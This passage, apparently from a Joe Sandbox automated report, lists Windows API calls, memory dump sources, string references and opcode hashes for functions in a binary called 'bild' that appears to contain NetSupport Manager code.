• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,?,?,11147278), ref: 11147169
• GetExitCodeThread.KERNEL32(00000000,00000000,?,?,?,?,?,?,11147278), ref: 11147174
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,11147278), ref: 11147181
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,11147278), ref: 11147187
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Thread$CloseHandle$CodeCreateExitObjectOpenSingleWait
• String ID:
• API String ID: 180989782-0
• Opcode ID: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
• Instruction ID: 262247fb5796f255492f056fed215dfab2d13c04184fcb9cbdc2136a2e7489e8
• Opcode Fuzzy Hash: f968cd3be34acbbfc001fc2c5c2cf1c984ef6abb93f92428a018694f843edebd
• Instruction Fuzzy Hash: 6901FA75D14219ABDB04DFA8C845BAEBBB8EF08710F108166F924E7284D774AA018B91
APIs
• SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
• CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
• CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
• WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
• CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: CloseHandle$EventObjectSingleWait
• String ID:
• API String ID: 2857295742-0
• Opcode ID: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
• Instruction ID: 8ed48fa67f8c8c814876f8dc7215a606f8693e2702a4d531ac155f54366f369e
• Opcode Fuzzy Hash: de728af195af138cefa6dff90218103564fc584f7cc06855e29f8d807c559bfa
• Instruction Fuzzy Hash: 46011A75A087049BE7A0DFB988D4A96F7ECEF58300F11592EE5AAC3200CB78B8448F50
APIs
• MapWindowPoints.USER32(?,00000000,?,00000002), ref: 1107712B
  • Part of subcall function 11076470: DeferWindowPos.USER32(8B000EA9,00000000,D8E85BC0,33CD335E,?,00000000,33CD335E,110771C6), ref: 110764B3
• EqualRect.USER32(?,?), ref: 1107713C
• SetWindowPos.USER32(00000000,00000000,?,33CD335E,D8E85BC0,8B000EA9,00000014,?,?,?,?,?,1107731A,00000000,?), ref: 11077196
Strings
• m_hWnd, xrefs: 11077177
• e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077172
Memory Dump Source
• Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_11000000_bild.jbxd
Yara matches
Similarity
• API ID: Window$DeferEqualPointsRect
• String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
• API String ID: 2754115966-2830328467
• Opcode ID: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
• Instruction ID: 41b5b1a8551b5e1f2f99f8414896ea4fcac58e3e889cf17ca758b789060a613c
• Opcode Fuzzy Hash: 99985b2635142920f8b9c22496a84f2b0050643658386b35a5a33d160634cd24
• Instruction Fuzzy Hash: E0413EB5A006099FDB14CFA9C884EAAFBF5FF88704F108559E9559B344D770AD00CBA4
                                                                                    APIs
                                                                                    • FindResourceA.KERNEL32(00000000,00001770,0000000A), ref: 1108918F
                                                                                    • LoadResource.KERNEL32(00000000,00000000,?,00000000,?,110CEF56,?), ref: 110891A4
                                                                                    • LockResource.KERNEL32(00000000,?,00000000,?,110CEF56,?), ref: 110891D6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Resource$FindLoadLock
                                                                                    • String ID: ..\ctl32\Errorhan.cpp$hMap
                                                                                    • API String ID: 2752051264-327499879
                                                                                    • Opcode ID: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                    • Instruction ID: ac104577f0cb8d44e6482e86c7e4f76e51294e6aac98140987b3b76ba3c25106
                                                                                    • Opcode Fuzzy Hash: 822e2482afd153fa47cf4ddbc35e772a2b3a06937125cb698dae634270013ce3
                                                                                    • Instruction Fuzzy Hash: 08110D3AF4C22556DB12EBE9AC45B69B7E89BC07A8B410475FC6CD71C4FA61D440C3E1
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000100,00000000), ref: 1114314B
                                                                                    • _strrchr.LIBCMT ref: 1114315A
                                                                                    • _strrchr.LIBCMT ref: 1114316A
                                                                                    • wsprintfA.USER32 ref: 11143185
                                                                                      • Part of subcall function 111456A0: GetModuleHandleA.KERNEL32(NSMTRACE,11194AB8), ref: 111456BA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Module_strrchr$FileHandleNamewsprintf
                                                                                    • String ID: BILD
                                                                                    • API String ID: 2529650285-1114602597
                                                                                    • Opcode ID: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                    • Instruction ID: d978b5afe12e8555e920acd6faf46f6bc40337599c773746d871781ff4fb06a8
                                                                                    • Opcode Fuzzy Hash: 832b53a00f043e857d3b8e09e9a2ce5d770147cd639c4bf1822df3017942b825
                                                                                    • Instruction Fuzzy Hash: DD21DD31A182698FE712EF348D407DAFBB4DF15B0CF2000D8D8850B182D7716885C7A0
                                                                                    APIs
                                                                                    • GetProfileStringA.KERNEL32(Windows,Device,No default printer,,LPT1:,?,00000050), ref: 11065366
                                                                                    • _memmove.LIBCMT ref: 110653B1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ProfileString_memmove
                                                                                    • String ID: Device$No default printer,,LPT1:$Windows
                                                                                    • API String ID: 1665476579-2460060945
                                                                                    • Opcode ID: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                    • Instruction ID: a358cf5610f4a81608be9fe47ec1da84b056d0ceaed1d9bd2f397f709d6f9fc8
                                                                                    • Opcode Fuzzy Hash: b42f47fad53366f1e4ac447008a1a2d6fd591c8f9db6545ab0f545fe689f24a8
                                                                                    • Instruction Fuzzy Hash: 0E119E35D002669AD700CFB0DC45BFEBBACDF01788F144158DC869B240EAF22609C3E1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeString$__wcsicoll_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3719176846-0
                                                                                    • Opcode ID: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                    • Instruction ID: f73372903cd30c0382670b71593fb0b3797c4e2875fb117f6f51c869b4ccb2fb
                                                                                    • Opcode Fuzzy Hash: 441a99ce500d99f467cd7fd3aeec64a7d709f35996a15428944c20697e7ebd2f
                                                                                    • Instruction Fuzzy Hash: 53A10A75E006299FCB21CF59CC84ADEB7B9AF89305F2045D9E50DAB610DB32AE85CF50
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FreeString$__wcsicoll_memset
                                                                                    • String ID:
                                                                                    • API String ID: 3719176846-0
                                                                                    • Opcode ID: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                    • Instruction ID: afd3f22c8fe7dd5f2f13fef18bd13733cf22d578236402d79b842a18f9b7ad91
                                                                                    • Opcode Fuzzy Hash: 630363bdb13d22254993ecf68dacbf692c7bf3f03afba6e05313967c32aba816
                                                                                    • Instruction Fuzzy Hash: E3A11871E006299FCB21DF59CC84ADEB7B9AF89305F2041D9E50DAB610DB32AE85CF50
                                                                                    APIs
                                                                                    Strings
                                                                                    • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081387
                                                                                    • ..\CTL32\DataStream.cpp, xrefs: 1108139E
                                                                                    • %02x, xrefs: 11081350
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf
                                                                                    • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                                    • API String ID: 2111968516-476189988
                                                                                    • Opcode ID: 2e0a70d7f48be011b9f6aa9edf4a09ec59e0beebed33c2f057e62bcad71544d0
                                                                                    • Instruction ID: f12dac7d373f74f5fe212c0395a9fec3f200c40d2e0a4ddded7d9712e57ff33a
                                                                                    • Opcode Fuzzy Hash: 2e0a70d7f48be011b9f6aa9edf4a09ec59e0beebed33c2f057e62bcad71544d0
                                                                                    • Instruction Fuzzy Hash: E621A375A052299FD724CF65DCC4EAEB3F8EF44308F0085AEE45A97640D670AD45CB60
                                                                                    APIs
                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110253E7
                                                                                    • GetDlgItem.USER32(?,00001399), ref: 11025421
                                                                                    • TranslateMessage.USER32(?), ref: 1102543A
                                                                                    • DispatchMessageA.USER32(?), ref: 11025444
                                                                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025486
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Message$DispatchItemTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 1381171329-0
                                                                                    • Opcode ID: bebdcbb2c02c8b11af5fb3a0b68c2766af8923a7f1998c3c6d7298e063844038
                                                                                    • Instruction ID: 26246af105c186e59b646e9f33a047c98996dcd180a805fce9500a05ed718ca0
                                                                                    • Opcode Fuzzy Hash: bebdcbb2c02c8b11af5fb3a0b68c2766af8923a7f1998c3c6d7298e063844038
                                                                                    • Instruction Fuzzy Hash: 7B21CF70F0030A67E718DB72C885BABF7F8AB4430DF804429EA2696180FB75A441CB95
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: wsprintf$VisibleWindow
                                                                                    • String ID: %d,%d,%d,%d,%d,%d
                                                                                    • API String ID: 1671172596-1913222166
                                                                                    • Opcode ID: 85305b6f0e97ae49525742254329e378668c5d080315b458b3003d671ba0b5ff
                                                                                    • Instruction ID: 208af751730b9df0a36513b51cfb93f89bd03d9f93b9dbce85b9ce09b73d059e
                                                                                    • Opcode Fuzzy Hash: 85305b6f0e97ae49525742254329e378668c5d080315b458b3003d671ba0b5ff
                                                                                    • Instruction Fuzzy Hash: 465181746001159FD710DB68CC90F9AB7F9BF88708F108698F6599B391DB70ED45CBA0
                                                                                    APIs
                                                                                    Strings
                                                                                    • BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s, xrefs: 1111706E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountTick$DeleteObject
                                                                                    • String ID: BltPending skipping Blt, sinceUpdate=%d ms, sinceBlt=%d ms, from=%s
                                                                                    • API String ID: 3011517232-3209293507
                                                                                    • Opcode ID: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                    • Instruction ID: 71694b1901628e7c3f0e0f97bec8b89b6520565b9ddb22d4603e25af3e6b7442
